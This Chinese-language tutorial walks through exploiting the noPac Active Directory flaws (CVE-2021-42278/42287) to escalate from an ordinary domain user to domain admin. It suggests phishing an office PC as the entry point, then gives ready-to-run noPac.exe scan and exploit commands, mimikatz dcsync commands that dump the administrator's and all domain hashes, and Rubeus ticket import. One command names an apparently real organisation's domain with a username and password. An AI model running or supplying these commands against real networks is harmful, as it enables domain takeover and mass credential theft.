域漏洞Nopac漏洞利用

Nopac

CVE-2021-42278

:::info 机器的账户名一般是以$结尾，如果AD没有对域内机器做用户名校验。 :::

CVE-2021-42287

:::info 与上述漏洞配合使用，创建与DC机器账户名字相同的机器账户（不以$结尾），账户请求一个TGT后，更名账户，然后通过S4U2self申请TGS Ticket，接着DC在TGS_REP阶段，这个账户不存在的时候，DC会使用自己的密钥加密TGS Ticket，提供一个属于该账户的PAC，然后我们就得到了一个高权限ST。 :::

利用条件

1. 普通域账号
2. 域用户有船舰机器用户的权限
3. DC未打KB5008380或KB5008602。

   利用参考

   如果通过钓鱼钓到办公电脑、对本机进行信息搜集，发现存在账号存在域、那就尝试获取本机的普通域用户密码。 ``` 使用noPac 测试是否存在漏洞 noPac.exe scan -domain DC.com -user “test” -pass “123456”

域控cifs服务器权限 noPac.exe -domain DC -user “test” -pass “123456” /dc DC-1.DC.com /mAccount ceshi1 /mPassword 123456 /service cifs /ptt

域控ldap权限-通过该服务导出域内hash noPac.exe -domain DC.com -user “lowpriv” -pass “1qaz@WSX” /dc AD-1.DC.com /mAccount ceshi12 /mPassword 1qaz@WSX /service ldap /ptt /impersonate Administrator

使用dcsync导出域内管理员hash mimikatz lsadump::dcsync /dc:DC-1.DC.com /domain:DC.com /user:administrator 使用dcsync导出域内所有用户hash mimikatz lsadump::dcsync /dc:DC-1.DC.com /domain:DC.com /all

还可以通过本地导入票据 绑定host Rubeus.exe ptt /ticket:票据信息

通过mimikatz 导出

其他常用命令 klist 查看票据 klist purge 清空票据

<a name="BEjMQ"></a>
## 利用过程
<a name="HozXZ"></a>
### 验证是否存在漏洞
```bash
noPac.exe scan -domain DC.com -user "test" -pass "123456"

C:\ProgramData\noPac.exe -domain AD.com -user guosl   -pass shirley /dc AD-S1RVER.AD.com  /mAccount demol211 /mPassword shirley /service ldap/ptt  /impersonate Administrator

返回票据

查看票据

确认票据存在

可以去验证是否可以使用

用cobalt strike 导出票据

mimikatz lsadump::dcsync /dc:DC-1.DC.com /domain:DC.com /user:administrator

本地抓取

修改本地hosts

:::info 可以解析到域就可以
C:\Windows\System32\drivers\etc\hosts
1.1.1.1 ad-1.dc.com :::

使用rubeus导入票据

导出hash

lsadump::dcsync /dc:AD-SERVER.gdmuseum.com /domain:gdmuseum.com /user:administrator

本地抓取hash

相关工具

GitHub - cube0x0/noPac: CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.
https://github.com/gentilkiwi/mimikatz
https://github.com/GhostPack/Rubeus

其他相关内容

PTH/PTK/PTT
利用dcsync导出域内的几种方法